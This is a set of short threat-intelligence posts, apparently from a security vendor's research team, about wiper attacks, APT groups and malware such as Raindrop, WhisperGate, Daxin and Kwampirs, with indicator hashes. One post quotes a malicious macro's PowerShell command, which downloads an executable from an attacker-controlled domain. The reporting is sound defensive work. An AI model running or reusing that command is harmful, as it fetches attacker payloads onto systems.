Breaking news on our SolarWinds investigation. We've found a previously undocumented piece of malware called Raindrop which was used by the attackers against some targets. bit.ly/3p9jaUJ#SolarWinds#Raindrop#Sunburst
Update on #wiper attacks against #ukraine. In some attacks ransomware was also deployed against affected organizations at the same time as the wiper, likely as a decoy or distraction. symantec-enterprise-blogs.se… IOC: 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382
Interesting detail from our analysis of the decoy ransomware used in #ukraine#wiper attacks. Strings made mocking references to U.S. president Joe Biden.
Another wiper attack targeting organizations in Albania by the Iranian Druidfly group. SHA256: 81eb22828306f3197b35fef2035cef2c548f587f8511902852964850023389d7 #wiper#druidfly#iran (1 of 5)
Our Threat Hunter Team has encountered a new variant of #SiestaGraph, malware that interacts with Microsoft’s Graph API for command and control via Outlook and OneDrive. File hash: fe8f99445ad139160a47b109a8f3291eef9c6a23b4869c48d341380d608ed4cb (1/2)
THREAD: Latest on #WhisperGate wiper attacks. Thanks to cooperation with the community, we can confirm related samples were being built by actors and possibly deployed to unknown victims as early as October 2021. Other unconfirmed samples may date even earlier. [1/4}
Our Threat Hunter team has found evidence of updated tooling by the Clubhorn APT group (aka #SideCopy). Recent attack involved modified version of #NightFury backdoor. (1/5)
APT attacks target Armenia. Attackers forged documents from the National Security Service of the Republic of Armenia,There is vba macro code
powershell iwr https://karabakhtelekom[.com/api/ekeng-mta.exe -UsebasicParsing -Outfile C:\users\Public\Downloads\ekeng-mta.exe
Ongoing campaign targeting IIS servers incl one airline in Middle East. Unknown payload (goopdate32.dll), likely sideloaded. Actor & motive unknown. Similar to reported Seedworm (MuddyWater) activity but low confidence. Also some low confidence links to Damselfly activity(1 of 2)
Read our blog to find out how advanced malware #Daxin attempts to evade detection by using communication techniques that can blend in unseen with normal network traffic on a victim network. Learn more: symantec-enterprise-blogs.se…#infosec
. @Symantec has identified the #Orangeworm attack group, which uses the #Kwampirs malware to target large healthcare-related firms in the U.S., Europe, and Asia symc.ly/2K1oJjU